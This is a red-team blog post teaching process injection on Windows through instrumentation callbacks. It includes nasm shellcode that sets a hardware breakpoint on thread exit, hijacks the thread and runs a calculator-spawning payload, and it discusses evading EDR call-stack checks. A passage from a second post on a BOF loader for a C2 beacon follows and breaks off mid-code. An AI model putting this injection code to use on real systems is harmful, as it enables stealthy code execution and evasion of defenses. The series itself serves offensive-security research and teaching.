Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
  • This post contains much assembly code; don’t be a script kiddie – take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this by the example of intercepting the syscall made by OpenProcess inside the subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven’t yet set an IC on another process even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Due to the IC getting executed as a callback to every returning syscall, setting an IC on another process would mean getting code execution in that process’s context, which can be used for a process injection.

Process injection

If you understood the blog series so far, it is very likely that you know what a process injection is. Let’s break down what is normally needed for a regular process injection, that is, injecting code into another process. Every process has its own virtual address space, so simply dereferencing an address that belongs to another process will not access that process’s memory; the code first needs to be written to the other process. To write the code to the other process’s memory space, you need a handle to the process with sufficient permissions and need to know where to write the code. For this you normally have two options: allocating memory in the other process’s context or overwriting an existing executable memory region. After the code has been written to an executable memory region, it needs to be executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms are, for example, API hooking, early bird APC injections or thread hijacking. There are many ways, but they all effectively just execute the written code.

There are multiple websites that collect different execution mechanisms; however, most don’t include ICs. While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. They briefly mentioned using ICs for call stack analysis to detect injections, which is a great use case for ICs, but ICs can also be used for exactly what that analysis is supposed to detect. That would also have the bonus effect of overwriting their IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint and how to protect against your own IC being overwritten.

I also found a blog post by splinter_code, who already wrote about using ICs for process injections in 2020. Don’t worry, we will of course expand on that and not copy his work. How complicated your IC injection code needs to be heavily depends on your payload. Assume you, for example, only want to make one WinExec call and your payload consists of about ten assembly instructions in total; this won’t add a massive overhead to the program. You could just call the payload directly in the IC (assuming you added a way to prevent recursion caused by syscalls made inside the IC), but once you use a payload that doesn’t return quickly, for example a C2 agent, the program will stop working or run into issues because a thread it requires was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks. So, how do we execute code without spawning a new thread and without blocking the thread that called the IC for long? By instead spawning a process. Just kidding, let’s reuse the hooking method from the previous blog post and instead hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could also, for example, use page guards.

To keep this post brief, we will not cover the following relevant topics, as they are not specific to this injection technique and there are multiple ways of implementing those: process ID enumeration, handle opening, memory allocation, memory writing.

Only one note on handle opening: a careful reader of the OpenProcess MSDN page might’ve read the following part: “If the caller has enabled the SeDebugPrivilege privilege, the requested access is granted regardless of the contents of the security descriptor.” As said in the recap, we found out in the first blog post that the SeDebugPrivilege is required to set an IC on another process. Herein lies the fundamental “problem” of using an IC as an injection technique. The SeDebugPrivilege is a very powerful privilege, as it effectively disables security checks. This means the injector already needs extensive privileges on the computer to use an IC as an injection technique. As mentioned by Microsoft, members of the Administrators group have the SeDebugPrivilege by default. This also means that you need that privilege to test your injector, for example by launching the injector from an administrative PowerShell.

Core injection logic

To simplify the rest of the blog post, let’s define some words that we will use:

  • Payload: This is the code that should get executed as the goal of the injection, in our case it will be a WinExec call that spawns a calculator. In your case it could be whatever, it could for example also be a manual mapper that maps an entire DLL into the victim process.
  • Payload wrapper: This includes all the code that sets up the payload execution. We will define the specific requirements later, but the wrapper is what the IC will execute. It is basically the IC bridge from the previous posts with some additional logic, just that it is this time injected into another process for the IC to execute there and not in its own process context. The wrapper remains static, only the payload changes.
  • Wrapped payload: Both the payload and the payload wrapper. The wrapped payload will be allocated and written to the victim process, not the payload and payload wrapper individually.

In the previous two blog posts we did not delve further into the build system, as we simply linked our C++ code with the assembly IC bridge; however, this isn’t what we will be doing this time. Both the payload and the payload wrapper need to be position-independent, as they shouldn’t be executed in our process’s context but in the victim’s. This also means that we need both the starting address and the size of the assembled code to copy it over to the other process. I find the easiest way to do this is to write the entire shellcode in an assembly file and then use a build system such as CMake with pre-compile steps to first assemble the file and then write the assembled bytes to a C++ header file that simply contains a C++ array with those bytes.

In other words: the CMakeLists.txt file contains multiple add_custom_command calls, which first execute the assembler (we’re using nasm), then use objcopy to copy the .text section of the object file into a temporary binary file and finally execute a Python script that reads the binary file and converts it into a C++ array, which is written to a header file that is part of the CMake target’s sources. In this case, we only did this for the payload wrapper.
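To illustrate the last prebuild step, here is a sketch of the conversion from raw bytes to header text. Our own step is a Python script; this C++ stand-in only shows the idea, and the function name, array name and output layout are assumptions made for this example.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <sstream>
#include <string>
#include <vector>

// Render raw bytes (e.g. the extracted .text section) as the text of a
// header that defines a byte array called `name`.
std::string bytes_to_header(const std::string& name,
                            const std::vector<std::uint8_t>& bytes) {
    assert(!bytes.empty());  // an empty array would not be valid C++
    static const char* digits = "0123456789abcdef";
    std::ostringstream out;
    out << "#pragma once\n\n"
        << "static const unsigned char " << name << "[] = {";
    for (std::size_t i = 0; i < bytes.size(); ++i) {
        // Start a new, indented line every 12 bytes
        out << (i % 12 == 0 ? "\n    " : " ")
            << "0x" << digits[bytes[i] >> 4] << digits[bytes[i] & 0xF] << ',';
    }
    out << "\n};\n";
    return out.str();
}
```

The injector can then include the generated header and use sizeof on the array to get the size of the shellcode.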

Payload

As mentioned before, we’re using nasm as assembler for this post. “;” marks comments in nasm.

For our testing we used the following hard-coded payload:

mov ecx,0x636c6163 ; calc
push rcx
mov rcx, rsp
mov r14,0x7fffffffffffffff ; will be replaced with WinExec

sub rsp, 0x28 ; Shadow space + alignment
call r14
add rsp, 0x30
ret

As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).

But why are we using 0x7fffffffffffffff as a call target? We aren’t, we are simply using it as a placeholder. ASLR changes the memory address of, among other things, WinExec. This means, WinExec’s address isn’t known at compile time. There are two solutions for this:

  1. We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
  2. We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) have the same base address in all processes, as it only gets changed on a reboot. This means, the address of WinExec in the injector is the same as in the process to inject into.

In this case we utilize option 2 to keep the shellcode small. Using a search function, 0x7fffffffffffffff will be replaced before it is injected into the other process to update it to its correct address. This is possible because, as mentioned, we copy the assembled bytes of the assembly code to an array, meaning the required bytes are not in R-X memory but in RW-. This could of course also be rewritten so that it reads in a payload instead of having it hard-coded.
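The search function mentioned above can be sketched as follows. This is not our injector code, just a minimal example; the function names are ours. The immediate of a `mov r64, imm64` instruction is stored little-endian, which is why the comparison is done byte by byte in that order.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Does the 8-byte little-endian value `v` start at `p`?
static bool matches_le64(const std::uint8_t* p, std::uint64_t v) {
    for (int k = 0; k < 8; ++k)
        if (p[k] != static_cast<std::uint8_t>(v >> (8 * k))) return false;
    return true;
}

// Write `v` as 8 little-endian bytes to `p`.
static void store_le64(std::uint8_t* p, std::uint64_t v) {
    for (int k = 0; k < 8; ++k) p[k] = static_cast<std::uint8_t>(v >> (8 * k));
}

// Replace every occurrence of `placeholder` in `code` with `value` and
// return the number of replacements.
std::size_t patch_placeholder(std::vector<std::uint8_t>& code,
                              std::uint64_t placeholder, std::uint64_t value) {
    std::size_t patched = 0;
    for (std::size_t i = 0; i + 8 <= code.size();) {
        if (matches_le64(code.data() + i, placeholder)) {
            store_le64(code.data() + i, value);
            ++patched;
            i += 8;  // skip the bytes that were just written
        } else {
            ++i;
        }
    }
    return patched;
}
```

In the injector, `value` would be the address of WinExec resolved in the injector’s own process, for example through GetModuleHandleA and GetProcAddress. Checking that the returned count is exactly 1 is a cheap way to notice a placeholder that was not found.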

The payload can be anything, as long as it considers the following restrictions:

  • Needs to be position-independent
  • Needs to properly restore the stack after execution or terminate its own thread

Payload wrapper

So, what does the payload wrapper need to include? Everything to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, which in our example would make multiple calculators pop up. That means, if we don’t want to unregister our IC after execution, we need a flag to signal when the payload was already executed. As the payload should execute once in the entire process and not once per thread, we will need a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉

Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.

The injected IC should execute the following rough pseudo-code logic:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen if the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is enabled before the function call and unset if the breakpoint wasn’t set successfully.

This means, GetThreadContext and SetThreadContext, the two functions issuing a syscall down the line, trigger the IC again but since they aren’t the expected exception they just return from the IC.
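To convince yourself that the flags in the pseudo code really prevent endless recursion and double execution, the control flow can be modeled without any Windows APIs. The following is a simplified model under our own assumptions: the types, the Origin enum and the nested call that stands in for the syscalls made by set_hwbp are all made up for this example.

```cpp
#include <cassert>

// Simplified model of the callback's control flow (no real syscalls).
struct Process { bool payload_executed = false; int payload_runs = 0; };
struct Thread  { bool hwbp_flag = false; bool hwbp_armed = false; };

enum class Origin { Syscall, ExitBreakpoint, OtherException };

void callback(Process& p, Thread& t, Origin origin,
              bool set_hwbp_succeeds = true) {
    if (!p.payload_executed && !t.hwbp_flag) {
        t.hwbp_flag = true;               // set first: set_hwbp re-enters the IC
        callback(p, t, Origin::Syscall);  // models the nested IC call
        t.hwbp_armed = set_hwbp_succeeds;
        if (!t.hwbp_armed)
            t.hwbp_flag = false;          // retry on the next IC call
        return;
    }
    if (origin != Origin::ExitBreakpoint)
        return;                           // not our exception
    t.hwbp_armed = false;                 // remove_hwbp
    if (!p.payload_executed) {
        p.payload_executed = true;
        ++p.payload_runs;                 // execute_payload()
    }
    // restore_context() would resume RtlExitUserThread here
}
```

Feeding this model a few syscalls from two threads followed by both threads exiting shows that the breakpoint is armed once per thread while the payload counter only ever reaches 1.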

A process-wide flag can be set by allocating memory with read and write permissions and using a certain address as a flag. As we want to avoid any RWX memory allocations, which are highly suspicious, we will need two memory regions with different permissions: RW- for the flag and R-X for the code itself. This causes another issue: the flag address can’t be known at assembly time because the memory is allocated dynamically. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only have the address of the flag in the same IC call in which the flag was allocated, as the code’s memory region isn’t writable, so we couldn’t store the address anywhere.

Our solution for this is to use a placeholder address for the flag, as with the WinExec address in the payload. The injector first allocates the memory for the flag and then searches for the placeholder inside the compiled wrapper that was written to an array through prebuild steps, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.

Setting a hardware breakpoint

As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.

The following code basically does the following:

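bool set_dr(DWORD64 bp_address, bool enable) {
    CONTEXT context = {};
    context.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    if (!GetThreadContext(GetCurrentThread(), &context))
        return false;
    context.Dr3 = bp_address;
    // Clear RW3/LEN3 (bits 28-31) and the local enable bit L3 (bit 6)
    context.Dr7 &= ~((0xFULL << 28) | (1ULL << 6));
    if (enable)
        context.Dr7 |= 1ULL << 6; // L3: local enable for Dr3
    return SetThreadContext(GetCurrentThread(), &context);
}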

Approximately this can be done with the following code; we just hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add the possibility to add all of them.

; rcx = breakpoint address
; rdx = Enable (1) / Disable (0)
; Return: Rax != 0 = success
; RSP needs to be aligned
set_dr:
   ; Save used registers
   push r14
   push r13
   push rdi
   push rbx
   mov r13, rcx
   mov rbx, rdx
   sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment
   mov rdi, rsp ; CONTEXT base
   mov r14, rdi ; rep stosq changes rdi, this is backup
   ; Zero CONTEXT struct
   mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
   xor rax, rax
   rep stosq
   ; CONTEXT_DEBUG_REGISTERS
   mov dword [r14 + 0x30], 0x00100010
   ; GetCurrentThread() == -2
   xor rcx, rcx
   dec rcx
   dec rcx
   ; The saved CONTEXT base
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x6CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
   ; if return value == 0 it errored
   test rax, rax
   jz _set_dr_ret
   ; Set Dr3
   mov qword [r14 + 0x60], r13
   ; offsetof(CONTEXT, Dr7) = 0x70
   mov rcx, [r14 + 0x70]
   ; Clear Dr3 specific bits: RW3/LEN3 (bits 28-31) and L3 (bit 6)
   and ecx, 0x0FFFFFBF ; 32-bit operation; the upper half of Dr7 is reserved and zero
   test rbx, rbx
   jz _skip_enable_bp
  ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)   
  or rcx, (1 << 6) 
_skip_enable_bp:
   ; Dr7 = new Dr7
   mov [r14+0x70], rcx
   ; SetThreadContext
   xor rcx, rcx
   dec rcx
   dec rcx
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; SetThreadContext placeholder
   mov rdi, 0x5CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
_set_dr_ret:
   add rsp, 0x4d8 ; + 8 alignment
   pop rbx
   pop rdi
   pop r13
   pop r14
   ret
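The Dr7 handling is the part of set_dr that is easiest to get wrong, so it can be worth checking in isolation. The sketch below (the function name is ours) generalizes it to any of the four debug registers. It relies on the x86-64 Dr7 layout: the local enable bit of register n is bit 2*n, and its RW/LEN fields are the four bits starting at bit 16 + 4*n. For Dr3 that is bit 6 and bits 28 to 31.

```cpp
#include <cassert>
#include <cstdint>

// Compute the new Dr7 value when debug register `index` (0-3) is used as
// an execute breakpoint that is either enabled or disabled.
constexpr std::uint64_t update_dr7(std::uint64_t dr7, unsigned index,
                                   bool enable) {
    const std::uint64_t local_enable = 1ULL << (2 * index);
    const std::uint64_t rw_len = 0xFULL << (16 + 4 * index);
    dr7 &= ~(local_enable | rw_len);  // RW = 00 (execute), LEN = 00
    if (enable)
        dr7 |= local_enable;
    return dr7;
}
```

For example, update_dr7(0, 3, true) yields 0x40, and settings that belong to the other debug registers are left untouched.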

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced by the injector before the wrapper is written to the victim process. For the thread-local one, we will again use the Thread Environment Block. There are less suspicious ways of doing this.

load_bp_set_ptr_into_rcx:
; TEB 
mov rcx, [gs:0x30] ; nasm expects the segment override inside the brackets
; TEB->InstrumentationCallbackDisabled 
add rcx, 1b8h
ret
load_bitflag_into_rcx:
; rcx = pointer bit flag (placeholder currently)
mov rcx, 0x2CCCCCCCCCCCCCCC
ret

Execution logic

Looking back at the pseudo code, we got set_hwbp and remove_hwbp covered and now also have access to the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. The stack isn’t guaranteed to be 16-byte aligned when the callback is entered (sometimes RSP % 0x10 = 8 instead of 0). To avoid issues, we manually align the stack so that all Windows API calls and also the payload call are made with a 16-byte-aligned stack. So that the stack can be properly restored, we don’t simply overwrite RSP but instead push a marker value, which is checked when returning to determine whether the stack was adjusted.

entry:
; The actual return address of the IC
push r10
push r14
mov r14, rsp
add r14, 0x10
push rax
push rcx
push rdx
; Rsp should be aligned for both cases, so it’s done here
mov rdx, rsp
and dl, 0xF
cmp dl, 0x8
jne _skip_align
mov rdx, 0xDEADBEEF
push rdx
_skip_align:
call load_bp_set_ptr_into_rcx
xor rax, rax
cmp [rcx], rax
je _hwbp_is_set
; “is_exception” check and payload execution
_hwbp_is_set:
; […]
_ret_unalign:
; Unalign rsp if it was previously modified
cmp dword [rsp], 0xDEADBEEF
jne _ret
add rsp, 8
_ret:
pop rdx
pop rcx
xor rcx, rcx
pop rax
pop r14
; r10 still on top of stack -> return to it
ret
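The alignment trick can be modeled on a toy stack to see that it restores RSP in both cases. This is only an illustration with made-up types; the real logic is the assembly above.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr std::uint64_t kMarker = 0xDEADBEEF;

// Toy downward-growing stack of 8-byte slots; rsp is tracked as a number.
struct ToyStack {
    std::uint64_t rsp;
    std::vector<std::uint64_t> slots;  // back() is the top of the stack
    void push(std::uint64_t v) { slots.push_back(v); rsp -= 8; }
    void pop() { slots.pop_back(); rsp += 8; }
};

// Mirrors the `and dl, 0xF` / `cmp dl, 0x8` check: pad with the marker
// if rsp is 8 bytes off a 16-byte boundary.
void align(ToyStack& s) {
    if ((s.rsp & 0xF) == 8) s.push(kMarker);
}

// Mirrors `_ret_unalign`: drop the marker again if its low 32 bits are
// found on top of the stack.
void unalign(ToyStack& s) {
    if (!s.slots.empty() && (s.slots.back() & 0xFFFFFFFFu) == kMarker) s.pop();
}
```

Note that the check on return only looks at the value on top of the stack. If no marker was pushed, that value is the saved rdx, so a saved rdx whose low 32 bits happen to equal 0xDEADBEEF would be mistaken for the marker. This is unlikely but worth keeping in mind.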

First execution

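To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread. In the assembly this is the code behind the _hwbp_is_set label, which, despite its name, is reached while the thread’s breakpoint flag is still 0. Let’s look at the relevant excerpt from the pseudo code: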

[…]
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
[…]

The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
call load_bitflag_into_rcx
xor rax, rax
inc rax
; Was payload already executed? If yes, don’t set BP
cmp [rcx], rax
je _ret_unalign
 ; Set BP set flag to avoid recursion
call load_bp_set_ptr_into_rcx
 xor rax, rax
inc rax
; bp set flag = 1
mov [rcx], rax
; RtlExitUserThread placeholder
mov rcx, 0x3CCCCCCCCCCCCCCC
xor rdx, rdx
inc rdx ; Enable hwbp
call set_dr
; Succeeded (rax != 0)? Then we are done
test rax, rax
jnz _ret_unalign
; Failed: bp set flag = 0 to retry on the next IC trigger
call load_bp_set_ptr_into_rcx
xor rax, rax
mov [rcx], rax
; Fall through on purpose to return
_ret_unalign:
; […]

After HWBP was set

Let’s look back at the pseudo code to see what is still missing for all this to function. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
[…]
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

We already implemented most of the required logic in the second part of this series – just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not again explain how we know that we need to intercept KiUserExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserExceptionDispatcher placeholder
   mov rcx, 0x4CCCCCCCCCCCCCCC
   cmp r10, rcx
   jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*, if it is a nullptr its bad :)
   test r14, r14
   jz _ret_unalign
   ; Exception thrown, but is it ours?
   ; RtlExitUserThread placeholder
   mov r10, 0x3CCCCCCCCCCCCCCC
   mov rcx, [r14+0xf8]
   cmp r10, rcx
   ; Not our exception
   jne _ret_unalign
   ; Unset bp
   xor rcx, rcx
   xor rdx, rdx
   call set_dr
   call load_bitflag_into_rcx
   ; Save context base
   push r14
   ; payload was already executed
   cmp qword [rcx], 1
   je _restore_context
   ; Set payload executed flag
   mov qword [rcx], 1
   sub rsp, 0x20
   call payload
   add rsp, 0x20
   ; as you can see, the payload needs to not mangle the stack
   ; otherwise it should call RtlExitUserThread itself
   ; if it mangled the stack rcx wouldn’t be the context base in the next line
_restore_context:
   ; Restore context base to rcx     
   pop rcx
   ; Set ResumeFlag in EFlags register
   or dword [rcx+0x44], 0x10000
   ; ExceptionRecord = nullptr
   xor rdx, rdx
   ; Call RtlRestoreContext
   sub rsp, 0x20
   mov rdi, 0x8CCCCCCCCCCCCCCC
   call rdi
   ; RtlRestoreContext doesn’t return

If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.
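Appending the separately assembled payload to the wrapper is then a plain concatenation. A minimal sketch, assuming both are already available as byte vectors (the struct and function names are ours):

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct WrappedPayload {
    std::vector<std::uint8_t> bytes;  // wrapper followed by payload
    std::size_t payload_offset;       // where the `payload` label ends up
};

// The wrapper's `payload` label sits at its very end, so the payload has
// to start exactly where the wrapper bytes stop.
WrappedPayload wrap_payload(const std::vector<std::uint8_t>& wrapper,
                            const std::vector<std::uint8_t>& payload) {
    WrappedPayload out{wrapper, wrapper.size()};
    out.bytes.insert(out.bytes.end(), payload.begin(), payload.end());
    return out;
}
```

The IC entry point stays at offset 0 of the combined buffer, so the address passed when setting the IC is simply the base address of the copied data in the victim process.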

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Speaking of which, the blog post is already pretty long, so we’ve decided not to add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will see that you need to replace the placeholders 0x2CCCCCCCCCCCCCCC through 0x8CCCCCCCCCCCCCCC. The placeholders are commented with the function they require. The flag placeholder simply requires a small allocation with read and write permissions in the target process (the wrapper reads and writes the flag as a qword, so reserve at least 8 bytes).
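
The search-and-replace step described above can be sketched as follows. This is a minimal sketch and not the code used for this series: the helper names patch_placeholder and concat_shellcode are hypothetical, and the sketch assumes a little-endian host so that the in-memory bytes of the 64-bit placeholder match the immediate in the assembled code.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Replaces the first occurrence of an 8-byte placeholder in `code` with
// `value`. Returns false if the placeholder was not found.
// Assumption: the host is little-endian (as x64 is), so the in-memory bytes
// of `placeholder` match the immediate operand in the assembled code.
// (Hypothetical helper; the name is not taken from the blog series.)
bool patch_placeholder(std::vector<std::uint8_t>& code,
                       std::uint64_t placeholder,
                       std::uint64_t value) {
    for (std::size_t i = 0; i + sizeof(placeholder) <= code.size(); ++i) {
        // memcmp/memcpy avoid unaligned 64-bit loads and stores.
        if (std::memcmp(code.data() + i, &placeholder, sizeof(placeholder)) == 0) {
            std::memcpy(code.data() + i, &value, sizeof(value));
            return true;
        }
    }
    return false;
}

// Appends the payload bytes to the wrapper bytes, so that a label at the
// very end of the wrapper refers to the first payload byte.
std::vector<std::uint8_t> concat_shellcode(const std::vector<std::uint8_t>& wrapper,
                                           const std::vector<std::uint8_t>& payload) {
    std::vector<std::uint8_t> out(wrapper);
    out.insert(out.end(), payload.begin(), payload.end());
    return out;
}
```

A caller would invoke patch_placeholder once per placeholder with the resolved function address (or the address of the flag allocation) and treat a false return value as a build error, since it means the wrapper and the patching code are out of sync.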

After replacing the placeholders and combining everything into one array/vector, that data needs to be written to an executable memory region in the victim process. For this, an open handle is required that allows memory writes and, if any allocations are made, memory allocations. After the shellcode has been copied over, an IC needs to be set on the other process, with the callback pointing to the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you need the SeDebugPrivilege to set an IC on another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge, ICs are the most powerful feature of Windows usable in user mode. We only covered a fraction of what is possible with ICs; for example, we haven’t covered getting callbacks to APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Reverse Engineering

Windows Instrumentation Callbacks – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco


Beacon Object Files for Mythic – Part 3

December 4, 2025

Beacon Object Files for Mythic: Enhancing Command and Control Frameworks – Part 3

This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

The blog post series accompanies the master’s thesis “Enhancing Command & Control Capabilities: Integrating Cobalt Strike’s Plugin System into a Mythic-based Beacon Developed at cirosec” by Leon Schmidt and the related source code release of our BOF loader.

Goals of our BOF runtime

As mentioned in the first part of this blog post series, several BOF loader implementations already exist. The best known is probably the COFF loader from TrustedSec (despite its name, the loader is fully able to run Cobalt Strike BOFs).

However, this loader was not usable for us for various reasons. Our own Mythic beacon has the peculiarity that it is built entirely as shellcode, which brought several disadvantages with it:

  • The C standard library cannot be used (just as in BOFs, and for the same reason: shellcode projects have no linking step either).
  • The Windows APIs can only be accessed indirectly – a simple #include <Windows.h> and direct calls to the functions are not possible.
  • Simple use of the process heap is not possible – memory always must be reserved and managed manually.

The COFF loader relies on all three of these features. Our task is therefore to build a loader that complies with these restrictions so that we can use it in our Mythic beacon. At the same time, this increases compatibility with other projects in the offensive security field, which are often subject to the same restrictions. This means that we must observe the following:

  • No functions from the C standard library may be used unless the compiler (in our case clang-cl) provides intrinsics for them.
  • The use of Windows APIs should be kept to a minimum. If they are required for a specific task, they must be passed as function pointers by the caller of the loader. This means that the caller is responsible for determining how to resolve the functions.
  • Memory management functions must also be passed by the caller. This allows the caller to define the memory management mechanics itself. The loader will not be able to function completely without memory allocations.
  • The Beacon API functions should also be implemented and passed by the caller, as their implementation sometimes includes system-specific features. It cannot be verified that the caller supports these.
  • The parameters for the BOF must be passed in the form of the size-prefixed binary blob, exactly as Cobalt Strike does. This ensures that the Data Parser API can correctly work with it. The binary blob must be created by the caller.

In the following sections, we describe how we achieved these goals. We have published our BOF loader at https://github.com/cirosec/bof-loader. It is therefore a good idea to look for the relevant code sections there to accompany this blog post. The included “TestMain” project shows an example of how to use the BOF loader, while the “BOFLoader” project includes, well, the BOF loader.

Implementation of our BOF loader

Preventing the usage of the standard library and Windows API

First, we need to get rid of some standard library calls and look for alternatives, especially those for string manipulation and memory management. memcpy and memset can be easily reimplemented manually (see BOFLoader/Memory.cpp). However, we need some help with allocation and deallocation: Here we use VirtualAlloc and HeapAlloc as well as VirtualFree and HeapFree from the Windows API. For HeapAlloc and HeapFree, we also need GetProcessHeap. These five functions can therefore be added to the list of functions that must be passed by the caller.
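
As an illustration of how small such replacements can be, here is a minimal byte-wise sketch. It is not the code from BOFLoader/Memory.cpp, and the names bof_memcpy and bof_memset are hypothetical.

```cpp
#include <cassert>
#include <cstddef>

// Byte-wise copy of `n` bytes from `src` to `dst`. Like memcpy, it does not
// support overlapping buffers. (Hypothetical name, illustrative only.)
void* bof_memcpy(void* dst, const void* src, std::size_t n) {
    assert(dst != nullptr && src != nullptr);
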